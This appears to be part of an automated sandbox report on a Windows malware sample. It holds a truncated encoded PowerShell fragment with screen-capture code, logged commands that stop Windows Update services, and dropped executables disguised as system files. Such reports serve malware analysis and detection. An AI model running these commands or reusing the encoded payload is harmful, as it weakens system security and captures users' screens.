RgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sirtu5ev\sirtu5ev.cmdline"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBBF6.tmp" "c:\Users\user\AppData\Local\Temp\sirtu5ev\CSCD8A1CC3D1CE048959A397DAF8AF51474.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBDBB.tmp" "c:\Windows\System32\CSC8CDC9FB2323C4007AF66CC17D2144E5.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F

Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: python3.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: libffi-8.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: sqlite3.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: libcrypto-3.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: libssl-3.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: dxgidebug.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Section loaded: msasn1.dll
Source: C:\ProgramData\svchost.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\ProgramData\svchost.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\ProgramData\svchost.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\ProgramData\svchost.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\ProgramData\svchost.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll
Source: C:\ProgramData\svchost.exe	Section loaded: version.dll
Source: C:\ProgramData\svchost.exe	Section loaded: dxgidebug.dll
Source: C:\ProgramData\svchost.exe	Section loaded: sfc_os.dll
Source: C:\ProgramData\svchost.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\svchost.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\svchost.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\svchost.exe	Section loaded: dwmapi.dll
Source: C:\ProgramData\svchost.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\svchost.exe	Section loaded: riched20.dll
Source: C:\ProgramData\svchost.exe	Section loaded: usp10.dll
Source: C:\ProgramData\svchost.exe	Section loaded: msls31.dll
Source: C:\ProgramData\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\svchost.exe	Section loaded: windowscodecs.dll
Source: C:\ProgramData\svchost.exe	Section loaded: textinputframework.dll
Source: C:\ProgramData\svchost.exe	Section loaded: coreuicomponents.dll
Source: C:\ProgramData\svchost.exe	Section loaded: coremessaging.dll
Source: C:\ProgramData\svchost.exe	Section loaded: ntmarta.dll
Source: C:\ProgramData\svchost.exe	Section loaded: coremessaging.dll
Source: C:\ProgramData\svchost.exe	Section loaded: wintypes.dll
Source: C:\ProgramData\svchost.exe	Section loaded: wintypes.dll
Source: C:\ProgramData\svchost.exe	Section loaded: wintypes.dll
Source: C:\ProgramData\svchost.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\svchost.exe	Section loaded: wldp.dll
Source: C:\ProgramData\svchost.exe	Section loaded: propsys.dll
Source: C:\ProgramData\svchost.exe	Section loaded: profapi.dll
Source: C:\ProgramData\svchost.exe	Section loaded: edputil.dll
Source: C:\ProgramData\svchost.exe	Section loaded: urlmon.dll
Source: C:\ProgramData\svchost.exe	Section loaded: iertutil.dll
Source: C:\ProgramData\svchost.exe	Section loaded: srvcli.dll
Source: C:\ProgramData\svchost.exe	Section loaded: netutils.dll
Source: C:\ProgramData\svchost.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\ProgramData\svchost.exe	Section loaded: policymanager.dll
Source: C:\ProgramData\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\ProgramData\svchost.exe	Section loaded: appresolver.dll
Source: C:\ProgramData\svchost.exe	Section loaded: bcp47langs.dll
Source: C:\ProgramData\svchost.exe	Section loaded: slc.dll
Source: C:\ProgramData\svchost.exe	Section loaded: userenv.dll
Source: C:\ProgramData\svchost.exe	Section loaded: sppc.dll
Source: C:\ProgramData\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\ProgramData\svchost.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\ProgramData\svchost.exe	Section loaded: pcacli.dll
Source: C:\ProgramData\svchost.exe	Section loaded: mpr.dll
Source: C:\ProgramData\main.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\main.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\main.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\main.exe	Section loaded: version.dll
Source: C:\ProgramData\main.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\main.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\main.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\main.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\main.exe	Section loaded: msasn1.dll
Source: C:\ProgramData\main.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\main.exe	Section loaded: wldp.dll
Source: C:\ProgramData\main.exe	Section loaded: profapi.dll
Source: C:\ProgramData\main.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\main.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\main.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\main.exe	Section loaded: rasapi32.dll
Source: C:\ProgramData\main.exe	Section loaded: rasman.dll
Source: C:\ProgramData\main.exe	Section loaded: rtutils.dll
Source: C:\ProgramData\main.exe	Section loaded: mswsock.dll
Source: C:\ProgramData\main.exe	Section loaded: winhttp.dll
Source: C:\ProgramData\main.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\ProgramData\main.exe	Section loaded: iphlpapi.dll
Source: C:\ProgramData\main.exe	Section loaded: dhcpcsvc6.dll
Source: C:\ProgramData\main.exe	Section loaded: dhcpcsvc.dll
Source: C:\ProgramData\main.exe	Section loaded: dnsapi.dll
Source: C:\ProgramData\main.exe	Section loaded: winnsi.dll
Source: C:\ProgramData\main.exe	Section loaded: rasadhlp.dll
Source: C:\ProgramData\main.exe	Section loaded: fwpuclnt.dll
Source: C:\ProgramData\main.exe	Section loaded: secur32.dll
Source: C:\ProgramData\main.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\main.exe	Section loaded: schannel.dll
Source: C:\ProgramData\main.exe	Section loaded: mskeyprotect.dll
Source: C:\ProgramData\main.exe	Section loaded: ntasn1.dll
Source: C:\ProgramData\main.exe	Section loaded: ncrypt.dll
Source: C:\ProgramData\main.exe	Section loaded: ncryptsslp.dll
Source: C:\ProgramData\main.exe	Section loaded: gpapi.dll
Source: C:\ProgramData\main.exe	Section loaded: wbemcomn.dll
Source: C:\ProgramData\main.exe	Section loaded: amsi.dll
Source: C:\ProgramData\main.exe	Section loaded: userenv.dll
Source: C:\ProgramData\main.exe	Section loaded: ntmarta.dll
Source: C:\ProgramData\main.exe	Section loaded: propsys.dll
Source: C:\ProgramData\main.exe	Section loaded: edputil.dll
Source: C:\ProgramData\main.exe	Section loaded: urlmon.dll
Source: C:\ProgramData\main.exe	Section loaded: iertutil.dll
Source: C:\ProgramData\main.exe	Section loaded: srvcli.dll
Source: C:\ProgramData\main.exe	Section loaded: netutils.dll
Source: C:\ProgramData\main.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\ProgramData\main.exe	Section loaded: wintypes.dll
Source: C:\ProgramData\main.exe	Section loaded: appresolver.dll
Source: C:\ProgramData\main.exe	Section loaded: bcp47langs.dll
Source: C:\ProgramData\main.exe	Section loaded: slc.dll
Source: C:\ProgramData\main.exe	Section loaded: sppc.dll
Source: C:\ProgramData\main.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\ProgramData\main.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
